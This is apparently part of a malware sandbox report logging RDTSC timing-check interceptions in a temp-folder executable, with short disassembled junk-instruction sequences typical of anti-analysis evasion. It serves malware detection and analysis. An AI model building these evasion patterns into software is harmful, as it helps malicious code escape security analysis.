Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942821 second address: 942825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941259 second address: 94129C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEE851EFD98h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FEE851EFD97h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 jno 00007FEE851EFD86h 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413C8 second address: 9413CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413CC second address: 9413D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413D2 second address: 9413D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941529 second address: 94153F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ch 0x00000007 jnl 00007FEE851EFD86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94153F second address: 941566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE84E88FCDh 0x00000008 jne 00007FEE84E88FC6h 0x0000000e jns 00007FEE84E88FC6h 0x00000014 jng 00007FEE84E88FC6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941566 second address: 94156A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94156A second address: 94156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9416E3 second address: 9416FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941832 second address: 94183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FEE84E88FC8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94183F second address: 941845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9419D0 second address: 9419E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941B09 second address: 941B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD8Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941F03 second address: 941F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94206F second address: 942077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942077 second address: 94207B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9421E4 second address: 9421EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 949E40 second address: 949E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b js 00007FEE84E88FC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94D1E0 second address: 94D1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94CD47 second address: 94CD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 953CB8 second address: 953CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9526ED second address: 9526FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FEE84E88FC6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9526FC second address: 952721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FEE851EFD86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952721 second address: 95273B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEE84E88FC6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FEE84E88FC8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952E00 second address: 952E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952F47 second address: 952F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95730F second address: 957334 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEE851EFD88h 0x00000008 push ebx 0x00000009 jbe 00007FEE851EFD86h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jg 00007FEE851EFD88h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jnl 00007FEE851EFD9Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 957334 second address: 957355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 jmp 00007FEE84E88FCAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 957355 second address: 95735B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95735B second address: 95735F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B50D second address: 95B520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 jmp 00007FEE851EFD8Bh 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B520 second address: 95B53D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FEE84E88FCFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B53D second address: 95B55A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE851EFD97h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B55A second address: 95B564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621DD second address: 9621F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE851EFD91h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621F7 second address: 9621FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621FD second address: 962204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962204 second address: 96220C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96220C second address: 962210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962A92 second address: 962A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962A96 second address: 962AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FEE851EFD98h 0x0000000f jmp 00007FEE851EFD8Fh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962D8F second address: 962D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962D93 second address: 962DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962DA0 second address: 962DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEE84E88FC6h 0x0000000a jc 00007FEE84E88FC6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963077 second address: 96307C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96307C second address: 9630A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b js 00007FEE84E88FC6h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FEE84E88FCEh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963372 second address: 963377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963377 second address: 96338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FEE84E88FE7h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96338A second address: 96338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963654 second address: 963659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963C24 second address: 963C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963C28 second address: 963C32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B8D second address: 968B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE851EFD86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B99 second address: 968B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B9D second address: 968BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FEE851EFD86h 0x00000011 jc 00007FEE851EFD86h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDEA second address: 96CDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDF0 second address: 96CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDF4 second address: 96CE21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FEE84E88FC6h 0x0000000d pop edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FEE84E88FD6h 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CE21 second address: 96CE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FEE851EFD88h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CE34 second address: 96CE3E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE84E88FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0F1 second address: 96C0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0F5 second address: 96C0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0FB second address: 96C107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE851EFD86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C107 second address: 96C10B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C423 second address: 96C427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C427 second address: 96C42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C42D second address: 96C437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C58E second address: 96C5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD1h 0x00000009 jp 00007FEE84E88FCCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C5AF second address: 96C5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C5B5 second address: 96C5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C6FB second address: 96C715 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE851EFD86h 0x00000008 je 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FEE851EFD86h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C9E7 second address: 96C9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FEE84E88FC6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8B57A4 second address: 8B57B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FEE851EFD86h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974A49 second address: 974A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974A4D second address: 974A64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEE851EFD8Ch 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974D2C second address: 974D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974D32 second address: 974D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE851EFD92h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9753FC second address: 975417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975417 second address: 97541C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97541C second address: 975421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975421 second address: 97543D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FEE851EFDACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE851EFD8Bh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9756C9 second address: 9756DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FEE84E88FCCh 0x0000000b jno 00007FEE84E88FC6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9756DA second address: 9756E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DBE second address: 975DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DC2 second address: 975DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FEE851EFD92h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DDA second address: 975DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEE84E88FCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DFA second address: 975DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9764C6 second address: 9764CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9764CA second address: 9764D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97C297 second address: 97C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97C29F second address: 97C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 988A3B second address: 988A46 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF3A second address: 98BF5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FEE851EFD90h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF5B second address: 98BF65 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
